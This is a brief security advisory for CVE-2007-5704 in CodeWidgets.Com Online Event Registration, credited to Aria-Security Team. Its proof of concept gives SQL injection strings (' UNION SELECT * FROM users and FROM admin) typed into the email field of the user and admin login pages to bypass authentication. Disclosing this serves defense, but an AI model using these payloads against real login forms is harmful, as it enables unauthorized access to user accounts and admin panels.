SecurityAlert : 3313 CVE : CVE-2007-5704 SecurityRisk : Medium (About) Remote Exploit : Yes Local Exploit : No Exploit Available : Yes Credit : Aria-Security Team Published : 30.10.2007
Affected Software :
CodeWidgets.Com Online Event Registration
Advisory Content :
http://Aria-Security.Net
-------------------------------------
CodeWidgets.Com Online Event Registration
Poc
Normal User account: (login.asp)
Email address: ' UNION SELECT * FROM users
password: Aria-Security.Net
Admin Panel: (admin_login.asp)
Email address: ' UNION SELECT * FROM admin
Password: Aria-Security.Net
Credits Goes To Aria-Security Team
Regards,
The-0utl4w
Feedback :
If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com.